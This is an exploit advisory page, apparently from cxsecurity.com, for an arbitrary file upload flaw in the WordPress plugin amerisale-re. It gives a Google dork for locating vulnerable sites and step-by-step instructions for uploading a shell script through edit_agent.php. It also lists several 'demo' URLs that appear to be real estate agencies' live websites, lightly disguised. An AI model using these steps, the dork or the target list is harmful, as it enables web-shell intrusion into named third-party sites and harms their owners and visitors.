Wordpress amerisale-re Arbitrary File Upload Vulnerability

2014.01.30
Credit: Ashiyane Digital Security Team
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/wp-content/plugins/amerisale-re

###################### # Exploit Title : Wordpress amerisale-re Arbitrary File Upload Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/ # Google Dork : inurl:/wp-content/plugins/amerisale-re # Date : 2014/01/23 # Tested on : Windows 8 , Linux ###################### Exploit : 1.Go to : http://Target.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php 2.At the end of page right click on Browse 3.Select Your File And Then Click Upload 4.Your Uploaded File (Shell Script,Pictures etc...) is shown in that page next to the browse button,right click on that and click view image Demo : http://c21lyncXh.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php http://pudowensrXealty.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php http://genecrouchXrealty.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php http://garrybrowXnrealestate.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php http://bexleyproXperties.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php http://johnpruittrXealty.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php http://lexingtonteXxasrealestate.com/wp-content/plugins/amerisale-re/agent_listings/edit_agent.php ##################################### # # Discovered by : Spoof # #####################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top